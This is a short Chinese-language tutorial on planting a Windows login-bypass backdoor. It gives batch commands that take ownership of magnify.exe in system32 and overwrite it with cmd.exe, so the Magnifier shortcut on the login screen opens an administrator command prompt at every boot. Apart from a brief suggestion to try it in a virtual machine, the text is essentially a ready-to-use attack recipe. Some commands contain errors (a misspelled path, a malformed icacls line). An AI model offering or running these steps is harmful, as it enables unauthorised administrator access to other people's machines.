注: 后门最好在虚拟机中实验
打开记事本写入代码文件并保存为back.bat
cd c:\window\system32
takeown /f magnify.exe
icacls magnify.exe magnify_back.exe
copy cmd.exe magnify.exe
其中 takeown 是以重新分配文件所有权的方式允许管理员重新获取先前被拒绝访问
的文件访问权 , 简单说就是可以改权限 /f 后跟文件名magnify.exe(放大镜)
创建好之后右键以管理员身份运行
之后的每一次开机都可以绕过登录用户开启终端 并得到管理员权限